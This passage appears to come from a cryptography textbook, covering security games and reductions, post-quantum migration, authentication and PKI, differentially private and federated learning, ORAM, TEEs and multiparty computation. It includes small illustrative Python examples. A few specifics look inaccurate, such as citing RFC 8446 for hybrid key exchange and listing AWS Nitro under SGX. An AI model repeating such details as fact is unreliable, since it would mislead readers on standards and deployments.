Modern cryptography is a mathematical discipline: every claimed security result is a proof. A security proof is a reduction demonstrating that breaking the proposed scheme is at least as hard as solving a well-studied problem (RSA, CDH, LWE). If no efficient algorithm for the hard problem is known, the reduction implies no efficient attack on the scheme.
15.1 The Security Game Framework
Security properties are defined via security games between a challenger \(\mathcal{C}\) and an adversary \(\mathcal{A}\). The canonical example is the IND-CPA (indistinguishability under chosen-plaintext attack) game:
- Setup: \(\mathcal{C}\) generates a key \(k \leftarrow \text{Gen}(1^\lambda)\).
- Learning phase: \(\mathcal{A}\) may adaptively query \(\mathcal{C}\) for encryptions of chosen plaintexts (unlimited queries).
- Challenge: \(\mathcal{A}\) submits two equal-length messages \(m_0, m_1\). \(\mathcal{C}\) picks \(b \leftarrow \{0,1\}\) uniformly and returns \(c^* = \text{Enc}_k(m_b)\).
- Guess: \(\mathcal{A}\) outputs \(b'\) and wins if \(b' = b\). The scheme is IND-CPA secure if every efficient adversary wins with probability at most \(1/2 + \text{negl}(\lambda)\); the excess over \(1/2\) is the adversary's advantage.
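The game can be made concrete with a toy harness. The "scheme" below — XOR with a fixed key and no nonce — is deliberately broken: it is deterministic, so identical plaintexts yield identical ciphertexts, and the adversary wins every trial using only its learning-phase query. This is an illustration of the game mechanics, not a standard construction:

```python
import os
import random

def enc(key: bytes, m: bytes) -> bytes:
    # Deterministic "encryption": XOR with the key, no randomness.
    return bytes(a ^ b for a, b in zip(m, key))

def ind_cpa_game(make_adversary, trials: int = 200, seed: int = 0) -> float:
    rng = random.Random(seed)
    wins = 0
    for _ in range(trials):
        key = os.urandom(16)
        oracle = lambda m: enc(key, m)            # learning-phase oracle
        m0, m1, guess = make_adversary(oracle)    # adversary's challenge pair
        b = rng.randint(0, 1)                     # challenger's secret bit
        c_star = oracle(m0 if b == 0 else m1)     # challenge ciphertext
        wins += (guess(c_star) == b)
    return wins / trials

def adversary(oracle):
    m0, m1 = b"A" * 16, b"B" * 16
    c0 = oracle(m0)   # learning phase: ask for m0's encryption once
    # Determinism means the challenge equals c0 exactly when b = 0.
    return m0, m1, (lambda c: 0 if c == c0 else 1)

assert ind_cpa_game(adversary) == 1.0   # advantage 1/2, the maximum
```

Any IND-CPA-secure scheme must therefore be randomised (fresh nonce or random IV per encryption) so that repeated queries on the same plaintext do not help.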
15.2 Reduction-Based Security
A security reduction shows that any efficient adversary breaking the scheme can be converted into an efficient algorithm solving the underlying hard problem. As a worked example, suppose an adversary \(\mathcal{A}\) breaks the IND-CPA security of AES in counter (CTR) mode with advantage \(\epsilon\); we build from it a distinguisher \(D\) against the PRP security of AES:
\(D\) receives oracle access to either AES\(_k\) (for a random key \(k\)) or a truly random permutation \(\pi\). \(D\) simulates the IND-CPA challenger for \(\mathcal{A}\): for each encryption query \(m\), pick a fresh nonce \(N\) and compute the keystream by querying the oracle on \((N, 1), (N, 2), \ldots\); XOR with \(m\). When \(\mathcal{A}\) submits \(m_0, m_1\), encrypt \(m_b\) the same way. Feed the ciphertext to \(\mathcal{A}\) and output \(1\) iff \(\mathcal{A}\) guesses correctly.
If the oracle is AES\(_k\), this is a perfect simulation of the IND-CPA game, so \(D\) outputs 1 with probability \(1/2 + \epsilon\). If the oracle is a random permutation \(\pi\), the keystream is uniformly random (since nonces are fresh), so the ciphertext is a one-time pad and \(\mathcal{A}\) wins with probability exactly \(1/2\). Hence \(D\)’s advantage is \(\epsilon\) — contradicting the PRP assumption if \(\epsilon\) is non-negligible.
This template — simulate the scheme’s challenger using the hard-problem oracle, extract the adversary’s advantage as the distinguisher’s advantage — underlies nearly every security proof in modern symmetric and public-key cryptography.
15.3 The Random Oracle Model
Many practical constructions (Fiat–Shamir, OAEP padding for RSA, PSS signatures) are proved secure in the random oracle model (ROM): all hash function calls are modelled as calls to a truly random function (an oracle) that returns a uniformly random output for each new query and the same output for repeated queries. The ROM proof strategy:
- Model \(H\) as a random oracle accessible to all parties (including adversary).
- Program the random oracle to embed the hard problem into the proof.
- Show that any adversary winning the security game must either solve the hard problem or detect that the oracle was “programmed” (impossible if the programming is indistinguishable from truly random).
ROM proofs are not unconditionally sound (Canetti, Goldreich, Halevi 1998 showed that some ROM-secure schemes are insecure when \(H\) is instantiated by any concrete function), but they are widely accepted as evidence of security in practice, and no concrete ROM-based scheme has been broken via this theoretical gap.
Chapter 16: Post-Quantum Transition
The standardisation of post-quantum cryptographic algorithms by NIST in 2024 marks the beginning of a long transition period. This chapter surveys the migration challenges and the current state of post-quantum deployment.
16.1 NIST Post-Quantum Standards
In August 2024, NIST finalised three primary post-quantum standards:
- ML-KEM (Kyber, FIPS 203): a key encapsulation mechanism based on Module-LWE. Replaces ECDH for key agreement. Parameters: Kyber-768 targets NIST security category 3 (comparable to AES-192), with 1184-byte public keys and 1088-byte ciphertexts — much larger than a 32-byte EC public key but practical for TLS.
- ML-DSA (Dilithium, FIPS 204): a digital signature scheme based on Module-LWE/SIS. Signatures are 2420–4595 bytes depending on parameter set. Already deployed in Linux kernel signing experiments and Let's Encrypt test deployments.
- SLH-DSA (SPHINCS+, FIPS 205): a hash-based signature scheme whose security rests only on the security of an underlying hash function. Extremely conservative for that reason, but with large signatures (8–50 KB). Suitable for firmware signing, where signature size is not a bottleneck.
16.2 Hybrid Key Exchange
The TLS working group has specified hybrid key exchange for TLS 1.3 (RFC 8446): the shared secret is derived from the concatenation of a classical ECDH secret and a post-quantum KEM secret, providing security against both classical and quantum adversaries. Even if one of the two algorithms is later broken (classically or quantumly), the session is still protected by the other. Google and Cloudflare have deployed hybrid ECDH+Kyber in Chrome and TLS endpoints since 2023 in preparation for the post-quantum transition.
16.3 Migration Challenges
Migrating public-key infrastructure to post-quantum algorithms is a decade-long engineering project with several specific challenges:
Key and signature size: RSA-2048 public keys are 256 bytes; Kyber-768 public keys are 1184 bytes. In constrained environments (IoT devices, embedded systems with limited RAM/flash), this may require hardware upgrades.
TLS handshake overhead: Larger key exchange messages increase TLS handshake sizes. For mobile devices on high-latency connections, this increases connection setup latency measurably. Kyber has been designed with this in mind (it is fast and compact for a post-quantum KEM), but Dilithium signatures are significantly larger than ECDSA signatures.
Certificate chains: X.509 certificates in the public PKI chain public keys and signatures. A full certificate chain (root CA → intermediate CA → leaf) with Dilithium signatures would run to roughly 10 KB or more, compared to a few kilobytes for the current RSA/ECDSA chain. This overhead affects every HTTPS connection.
Cryptographic agility: Systems must be designed for cryptographic agility — the ability to swap algorithms without major re-engineering — since post-quantum algorithms are newer and may yet have vulnerabilities discovered. The Rainbow signature scheme, a NIST finalist, was broken by a single researcher in a weekend in 2022; the SIKE (isogeny-based) KEM was broken classically in 2022 in an hour on a laptop. Hybrid approaches and agile architectures protect against such surprises.
Chapter 17: Access Control and Authentication
Cryptographic mechanisms secure the channel and authenticate message integrity, but access control determines which authenticated principals may access which resources. Access control and authentication are complementary layers of the security stack.
17.1 Authentication Factors and Multi-Factor Authentication
Authentication proves identity via one or more factors:
- Knowledge factor (something you know): passwords, PINs, security questions.
- Possession factor (something you have): TOTP tokens (Google Authenticator), FIDO2 hardware keys (YubiKey), smart cards.
- Inherence factor (something you are): biometrics (fingerprint, face recognition, voice).
TOTP (Time-based One-Time Password, RFC 6238): an HMAC-based OTP computed over the current Unix time divided into 30-second windows: \(\text{OTP} = \text{HOTP}(K, \lfloor t/30 \rfloor)\) where \(\text{HOTP}(K, c) = \text{Truncate}(\text{HMAC-SHA1}(K, c))\). The 6-digit OTP is valid for 30 seconds. TOTP requires no network communication, but it is not phishing-resistant: a real-time phishing proxy can relay the code to the genuine site within its validity window.
FIDO2 / WebAuthn: eliminates shared secrets entirely. During registration, the authenticator generates a keypair; the public key is stored at the server, the private key stays on the device. During authentication, the authenticator signs a challenge (including the origin domain) with the private key. This is phishing-resistant because the signed challenge includes the actual domain — a phishing site with a lookalike domain receives a signature over the wrong origin and cannot use it for the real site.
17.2 Access Control Models
- ACL (Access Control List): per-object column of (subject, permissions) pairs. Unix file permissions and NTFS ACLs use this model. Efficiently answers "who can access this file?"
- Capability list: per-subject row of (object, permissions) pairs. Capability-based systems (Capsicum, seL4) use this model. Efficiently answers "what can this process access?"
Mandatory Access Control (MAC): the OS enforces security labels — subjects and objects are assigned classification levels (Top Secret > Secret > Confidential > Unclassified). The Bell-LaPadula model enforces no read up (a subject cannot read objects at a higher classification than their clearance) and no write down (a subject cannot write to objects at a lower classification, preventing leaks). MAC is used in military and government systems; SELinux and AppArmor implement MAC for Linux.
Role-Based Access Control (RBAC): permissions are assigned to roles, and users are assigned to roles. RBAC simplifies administration in large organisations: a new employee is assigned the appropriate role and immediately inherits the correct permissions, without the administrator needing to enumerate individual permissions. The principle of least privilege — granting only the minimum permissions needed for a task — is more easily enforced with RBAC than with arbitrary ACL entries.
17.3 PKI and Certificate Chains
Public Key Infrastructure (PKI) solves the key distribution problem for public-key cryptography at scale: how does Alice know that the public key \(pk_B\) actually belongs to Bob? PKI answers this via a chain of trust:
- A Certificate Authority (CA) digitally signs a certificate binding a domain name to a public key: \(\text{Cert} = (\text{domain}, pk, \text{validity}, \ldots, \text{Sig}_{CA}(\text{domain}, pk, \ldots))\).
- Browsers trust a fixed set of root CAs (embedded in the OS/browser trust store; approximately 100–150 root CAs are trusted by default in Chrome and Firefox).
- Root CAs sign intermediate CA certificates; intermediates sign leaf certificates. The chain from leaf to root establishes trust.
Certificate revocation is the Achilles’ heel of PKI: when a private key is compromised, the associated certificate must be revoked. OCSP (Online Certificate Status Protocol) allows real-time revocation queries, but most browsers rely on OCSP stapling (the server includes a signed OCSP response in the TLS handshake) or pre-downloaded revocation lists such as CRLSets.
The 2011 DigiNotar breach — a Dutch CA was compromised, and attackers issued fraudulent certificates for google.com, used to MITM Iranian users — led to DigiNotar being removed from all trust stores and its bankruptcy within weeks. Certificate Transparency (CT, RFC 6962) addresses this systemically: CAs must log every certificate they issue to public, append-only Merkle-tree logs, and browsers require SCTs (Signed Certificate Timestamps) proving log inclusion before accepting a certificate. This makes fraudulent certificate issuance detectable.
Summary: Security Primitives at a Glance
| Goal | Primitive | Standard | Notes |
|---|---|---|---|
| Confidentiality | AES-256-GCM | FIPS 197 / SP 800-38D | AEAD; fresh nonce required |
| Integrity + auth | HMAC-SHA-256 | RFC 2104 | Constant-time comparison required |
| Key agreement | X25519 + Kyber-768 | RFC 7748, FIPS 203 | Hybrid for PQ transition |
| Digital signatures | Ed25519 / ML-DSA | RFC 8032, FIPS 204 | Ed25519 for classical, ML-DSA for PQ |
| Password hashing | Argon2id | RFC 9106 | Memory-hard; bcrypt/scrypt acceptable |
| Key derivation | HKDF-SHA-256 | RFC 5869 | Extract-then-expand pattern |
| Secure channel | TLS 1.3 | RFC 8446 | Mandatory for all network comms |
| Zero-knowledge | Schnorr / zk-SNARK | RFC 8235 (Schnorr NIZK) | SNARKs for blockchain privacy |
Chapter 18: Privacy-Preserving Machine Learning
Machine learning systems trained on personal data face a fundamental privacy tension: the model must learn from individual data points, yet individuals should not be identifiable from the trained model. Privacy-preserving ML addresses this at the model training and inference stages.
18.1 Differential Privacy in Machine Learning
The standard mechanism for private ML is DP-SGD (Differentially Private Stochastic Gradient Descent, Abadi et al. 2016): at each training step, gradients are clipped to a maximum L2 norm (limiting the influence of any single example), Gaussian noise is added to the clipped gradients, and the noisy gradients are used to update the model weights.
- Sample a mini-batch \(B_t\) by including each example independently with probability \(q = |B|/N\) (Poisson sampling).
- For each example \(x_i \in B_t\), compute gradient \(g_i = \nabla_\theta L(\theta; x_i)\).
- Clip: \(\bar{g}_i = g_i / \max(1, \|g_i\|_2 / C)\) where \(C\) is the clipping norm.
- Add noise: \(\tilde{g} = \frac{1}{|B|}\left(\sum_i \bar{g}_i + \mathcal{N}(0, \sigma^2 C^2 I)\right)\).
- Update: \(\theta_{t+1} = \theta_t - \eta \tilde{g}\).
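The steps above can be sketched in NumPy (the hyperparameters, gradient shapes, and toy data here are illustrative; production code would use a DP accounting library to track the \((\epsilon, \delta)\) budget):

```python
import numpy as np

def dp_sgd_step(theta, per_example_grads, C=1.0, sigma=1.0, eta=0.1, rng=None):
    """One DP-SGD update. `per_example_grads` has shape (batch, dim):
    one per-example gradient per row."""
    if rng is None:
        rng = np.random.default_rng(0)
    # Per-example clipping: g_i / max(1, ||g_i||_2 / C), so no single
    # example contributes more than norm C to the sum.
    norms = np.linalg.norm(per_example_grads, axis=1, keepdims=True)
    clipped = per_example_grads / np.maximum(1.0, norms / C)
    # Gaussian noise scaled to the clipping norm, added to the SUM.
    noise = rng.normal(0.0, sigma * C, size=theta.shape)
    g_tilde = (clipped.sum(axis=0) + noise) / len(per_example_grads)
    return theta - eta * g_tilde

# Sanity check: after clipping, every per-example gradient has norm <= C.
g = np.random.default_rng(1).normal(size=(8, 4)) * 10
clipped = g / np.maximum(1.0, np.linalg.norm(g, axis=1, keepdims=True) / 1.0)
assert np.all(np.linalg.norm(clipped, axis=1) <= 1.0 + 1e-9)
```

The clipping bound is what converts the per-step noise into a formal sensitivity argument: the noise scale \(\sigma C\) is calibrated to the worst-case influence \(C\) of any one example.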
18.2 Federated Learning
Federated learning (McMahan et al. 2017) trains a model across decentralised devices (phones, hospitals) without centralising the raw data. Each round:
- A central server sends the current model \(\theta_t\) to a subset of devices.
- Each device \(i\) trains locally on its data for \(E\) epochs, producing a local model update \(\Delta_i = \theta_i' - \theta_t\).
- The server aggregates updates: \(\theta_{t+1} = \theta_t + \frac{1}{K}\sum_i \Delta_i\) (FedAvg).
- Repeat until convergence.
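One FedAvg round can be sketched in NumPy. The local "training" function below is a made-up stand-in (a single step toward each client's own optimum, in place of \(E\) epochs of SGD on real local data):

```python
import numpy as np

def fedavg_round(theta, local_train, clients):
    """One FedAvg round: each client trains locally on its own data,
    the server averages the resulting model deltas."""
    deltas = [local_train(theta, c) - theta for c in clients]
    return theta + np.mean(deltas, axis=0)

# Hypothetical local training: pull the model halfway toward the
# client's local optimum (stand-in for E local epochs).
local = lambda theta, opt: theta + 0.5 * (opt - theta)

clients = [np.array([0.0, 2.0]), np.array([2.0, 0.0])]
theta = np.zeros(2)
for _ in range(20):
    theta = fedavg_round(theta, local, clients)

# The global model converges to the average of the client optima, (1, 1).
assert np.allclose(theta, [1.0, 1.0], atol=1e-3)
```

Note that only the deltas \(\Delta_i\) ever leave each client; as the next paragraph explains, that alone is not a privacy guarantee, since deltas can be inverted.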
Federated learning reduces data centralisation but does not provide privacy by itself: gradient updates can leak significant information about training data through gradient inversion attacks (Zhu et al. 2019 showed that individual training images can be reconstructed from a single gradient update to near-perfect accuracy). The combination of federated learning with DP-SGD (called federated DP) provides the strongest practical guarantee: local DP applied before aggregation, or central DP applied to the aggregated gradients. Apple uses federated DP for keyboard next-word prediction and emoji suggestions on iOS, with published privacy parameters (\(\epsilon \approx 2\) per day per user).
18.3 Membership Inference Attacks
Membership inference attacks (Shokri et al. 2017) determine whether a specific record was in a model’s training set, given black-box access to the model. The attack trains a meta-classifier on the distinction between “member” (training set) and “non-member” (test set) behaviour: models tend to have higher confidence on training examples (overfitting). ML models trained without privacy guarantees can leak substantial membership information — attack success rates of 60–80% have been demonstrated on production models (including a GPT-2 fine-tuned on medical notes).
Differential privacy directly mitigates membership inference: \(\epsilon\)-DP implies that the membership inference advantage of any adversary is bounded by \(e^\epsilon - 1\). For small \(\epsilon\) (strong privacy), membership inference is essentially no better than random guessing.
18.4 Machine Unlearning
Privacy regulations (GDPR right to erasure, CCPA deletion right) create a legal obligation to delete an individual’s data from trained models — so-called machine unlearning. Exact unlearning (retraining from scratch without the deleted record) is computationally feasible for small models but prohibitive for large neural networks trained on billions of records. Approximate unlearning algorithms (SISA training: sharded-isolated-sliced-aggregated; gradient ascent on the deleted records; Newton’s method in function space) aim to achieve unlearning with significantly less computation. The soundness of approximate unlearning — whether the post-unlearning model is genuinely statistically indistinguishable from a model trained without the record — remains an active research question, and no algorithm has been formally certified under GDPR compliance. This gap between the legal obligation and the technical reality is a significant open problem at the intersection of ML and privacy law.
Chapter 19: Oblivious RAM and Private Computation
19.1 Oblivious RAM
When a client outsources storage to an untrusted server, the server can observe which memory locations are accessed, even if the stored data is encrypted. Access patterns can reveal significant information: the sequence of database lookups reveals which records were queried; the sequence of file accesses reveals browsing history or document structure.
Oblivious RAM (ORAM) (Goldreich and Ostrovsky 1987, 1996) is a cryptographic primitive that hides access patterns: an ORAM scheme allows a client to read and write a remote array of \(N\) blocks such that the server observes a sequence of physical accesses that is statistically independent of the logical access pattern.
The PathORAM scheme (Stefanov et al. 2013) achieves \(O(\log^2 N)\) bandwidth overhead and is practically deployed in TrustZone and SGX enclaves for private database queries. The construction organises server storage as a binary tree of “buckets”; each logical access reads and rewrites a complete root-to-leaf path, shuffling the block to a new random position. This ensures the server sees uniformly random paths regardless of which logical block is accessed.
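The tree layout is easy to make concrete. Storing the buckets in an implicit array (node \(i\) has children \(2i+1\) and \(2i+2\), as in a binary heap), a sketch of the root-to-leaf path computation — the set of buckets read and rewritten on every access — looks like:

```python
def path_to_leaf(leaf: int, depth: int) -> list[int]:
    """Bucket indices on the root-to-leaf path in an implicit binary
    tree of the given depth (root = index 0, leaves at the bottom)."""
    node = (1 << depth) - 1 + leaf   # array index of the leaf bucket
    path = [node]
    while node > 0:
        node = (node - 1) // 2       # parent in the implicit array tree
        path.append(node)
    return path[::-1]                # root first

# Depth-2 tree: 7 buckets, 4 leaves. The path to leaf 2 passes through
# the root (0), its right child (2), and that node's left child (5).
assert path_to_leaf(2, 2) == [0, 2, 5]
```

Because the client remaps the accessed block to a fresh uniformly random leaf after each access, the server only ever sees independent uniform leaf choices, whatever the logical access sequence.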
19.2 Trusted Execution Environments
Trusted Execution Environments (TEEs) provide hardware-enforced isolation: a secure enclave executes code and holds data in encrypted memory, shielded from the host OS, hypervisor, and other processes. Even the hardware manufacturer cannot read enclave memory after deployment (ideally).
- Intel SGX (Software Guard Extensions): creates encrypted enclaves in user space. Remote attestation allows a remote party to verify the enclave’s code hash and hardware identity, establishing trust. SGX has been extensively attacked via side channels (cache timing, speculative execution — Foreshadow), but remains widely deployed in cloud confidential computing (Microsoft Azure, AWS Nitro).
- ARM TrustZone: splits the processor into Normal World (untrusted OS) and Secure World (trusted OS for sensitive operations — biometric data, payment keys, DRM). Used in nearly all smartphones.
- AMD SEV (Secure Encrypted Virtualisation): encrypts the memory of entire virtual machines, protecting tenant data from a compromised hypervisor. SEV-SNP (2021) adds integrity guarantees and attestation.
TEEs enable confidential computing — cloud customers can process sensitive data in the cloud without trusting the cloud provider’s infrastructure, verified by remote attestation. The NIST Cybersecurity Framework 2.0 (2024) explicitly references TEEs as a control for sensitive data processing in untrusted environments.
19.3 Secure Multiparty Computation in Practice
The Yao garbled circuit protocol (Chapter 8) handles two-party computation; for \(n > 2\) parties, the BGW protocol provides information-theoretic MPC. In practice, the main deployment challenges are:
Communication complexity: BGW requires \(O(n^2)\) point-to-point messages per gate for an \(n\)-party computation. For large \(n\) (hundreds of parties), broadcast-based protocols and secret-sharing optimisations reduce this. The SPDZ protocol (Damgård et al.) uses preprocessing (offline) plus fast online evaluation, achieving near-linear communication in \(n\) for the online phase.
Deployment: Notable real-world MPC deployments: (1) the Danish sugar beet auction (2008) — the first commercial MPC deployment; (2) privacy-preserving set intersection for COVID contact tracing in PEPP-PT and DP3T; (3) the Boston Equal Pay study (2017) — Azer Bestavros and colleagues at Boston University used MPC to compute salary statistics across companies without revealing individual companies’ data, publishing evidence of gender wage gaps while maintaining employer confidentiality.
The gap between MPC research and practice is narrowing. Modern frameworks (MOTION, SCALE-MAMBA, MP-SPDZ) enable non-experts to implement MPC protocols with security proofs. The main remaining barriers are latency (MPC typically requires multiple rounds of interaction, each adding network RTT) and the need for secure channels between all parties, which requires a PKI or out-of-band key exchange before computation begins.